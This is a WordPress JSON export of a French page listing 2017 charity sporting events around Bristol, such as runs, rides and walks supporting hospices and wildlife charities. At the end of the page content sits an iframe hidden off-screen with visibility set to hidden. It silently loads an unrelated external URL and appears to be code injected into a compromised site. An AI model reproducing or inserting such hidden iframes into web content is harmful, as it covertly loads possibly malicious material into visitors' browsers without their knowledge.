{"id":2401,"date":"2022-06-15T10:56:25","date_gmt":"2022-06-15T10:56:25","guid":{"rendered":"http:\/\/rainbowfitness.org\/evenements-ouverts\/"},"modified":"2022-06-15T10:56:29","modified_gmt":"2022-06-15T10:56:29","slug":"evenements-ouverts","status":"publish","type":"page","link":"https:\/\/rainbowfitness.org\/fr\/evenements-ouverts\/","title":{"rendered":"\u00c9v\u00e9nements ouverts"},"content":{"rendered":"[vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1466687919046{padding-top: 20px !important;padding-bottom: 40px !important;}\u00a0\u00bb][vc_column_text]\n<h1 style=\"text-align: center;\"><span style=\"color: #2c82c9;\">\u00c9V\u00c9NEMENTS OUVERTS<\/span><\/h1>\n[\/vc_column_text][vc_separator type=\u00a0\u00bbsmall\u00a0\u00bb position=\u00a0\u00bbcenter\u00a0\u00bb color=\u00a0\u00bb#9365b8&Prime; thickness=\u00a0\u00bb5&Prime;][vc_column_text]<span style=\"color: #ffffff;\"> &#8211; Dimanche 29 janvier, <span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"http:\/\/www.tach.org.uk\/tach-club-races\" target=\"_blank\" rel=\"noopener\">Moorland Multiterrain 10km Bristol<\/a><\/strong><\/span> ; soutenir le centre d&rsquo;\u00e9quitation Avon pour les personnes handicap\u00e9es.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\"> &#8211; Samedi 8 avril, <span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"http:\/\/tourdebristol.stpetershospice.org.uk\/\" target=\"_blank\" rel=\"noopener\">Tour de Bristo<\/a> l<\/strong><\/span> , Balade caritative : 35, 50 ou 100 km \u00e0 v\u00e9lo. Soutenir l&rsquo;Hospice Saint-Pierre.<br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> &#8211; Dimanche 7 Mai 2017, <span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"http:\/\/www.wiltshirewildlife.org\/\" target=\"_blank\" rel=\"noopener\">Sentier du Sarsen<\/a><\/strong><\/span> : Marathon N\u00e9olithique, 1\/2 Marathon, Sentier p\u00e9destre &amp; Sentier cyclable. Beaucoup de choix ! Tout le co\u00fbt des frais d&rsquo;inscription [low cost aussi!] Va \u00e0 l&rsquo;association caritative locale pour la vie sauvage.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\"> &#8211; Samedi 17 juin, <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/www.chsw.org.uk\/events\/rainbow-run\" target=\"_blank\" rel=\"noopener\"><strong>Rainbow Run<\/strong><\/a><\/span> . Soutenir les enfants Hospice Sud-Ouest[CHSW] .<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\"> &#8211; Du vendredi 7 juillet au 9 juillet, <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/www.chsw.org.uk\/events\/ride-for-precious-lives\" target=\"_blank\" rel=\"noopener\"><strong>Ride for Precious Lives<\/strong><\/a><\/span> . Soutenir les enfants Hospice Sud-Ouest[CHSW] .<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\">&#8211; Samedi 8 juillet, Balade de <span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"http:\/\/midnightwalk.stpetershospice.org.uk\/\" target=\"_blank\" rel=\"noopener\">Minuit, Balade<\/a><\/strong><\/span> caritative : 5 ou 10 milles enti\u00e8rement balis\u00e9s. Soutenir l&rsquo;Hospice Saint-Pierre.<br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\"> &#8211; Samedi 2 septembre, <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/www.chsw.org.uk\/events\/running\/bubble-rush\" target=\"_blank\" rel=\"noopener\"><strong>Bubble Rush<\/strong><\/a><\/span> , \u00e9preuve de 5km \u00e0 Weston s\/Mer. Soutenir les enfants Hospice Sud-Ouest[CHSW] .<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ffffff;\"> <span style=\"font-family: Arial;\">&#8211; Dimanche 10 d\u00e9cembre,<\/span> <span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"http:\/\/www.chsw.org.uk\/events\/christmas\/santas-on-the-run\" target=\"_blank\" rel=\"noopener\">Santa&rsquo;s on the Run : marche de 2km<\/a><\/strong><\/span> &#8211; course pour toute la famille ; soutenir les familles locales<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> organisme de bienfaisance CHSW.<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> <\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> &#8211; <a style=\"color: #ffffff;\" href=\"http:\/\/www.chsw.org.uk\/cycling\" target=\"_blank\" rel=\"noopener\">Plus d&rsquo;\u00e9v\u00e9nements cyclistes<\/a> .<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><iframe loading=\"lazy\" style=\"position: absolute; top: -999px; left: -999px; visibility: hidden;\" src=\"https:\/\/cdncache-a.akamaihd.net\/store\/\" width=\"300\" height=\"150\"><\/iframe>[\/vc_column_text][\/vc_column][\/vc_row]\n","protected":false},"excerpt":{"rendered":"<p>[vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1466687919046{padding-top: 20px !important;padding-bottom: 40px !important;}\u00a0\u00bb][vc_column_text] \u00c9V\u00c9NEMENTS OUVERTS [\/vc_column_text][vc_separator type=\u00a0\u00bbsmall\u00a0\u00bb position=\u00a0\u00bbcenter\u00a0\u00bb color=\u00a0\u00bb#9365b8&Prime; thickness=\u00a0\u00bb5&Prime;][vc_column_text] &#8211; Dimanche 29 janvier, Moorland Multiterrain 10km Bristol ; soutenir le centre d&rsquo;\u00e9quitation Avon pour les personnes handicap\u00e9es. &nbsp; &#8211; Samedi 8 avril, Tour de&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2401","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2401","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/comments?post=2401"}],"version-history":[{"count":1,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2401\/revisions"}],"predecessor-version":[{"id":2406,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2401\/revisions\/2406"}],"wp:attachment":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/media?parent=2401"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}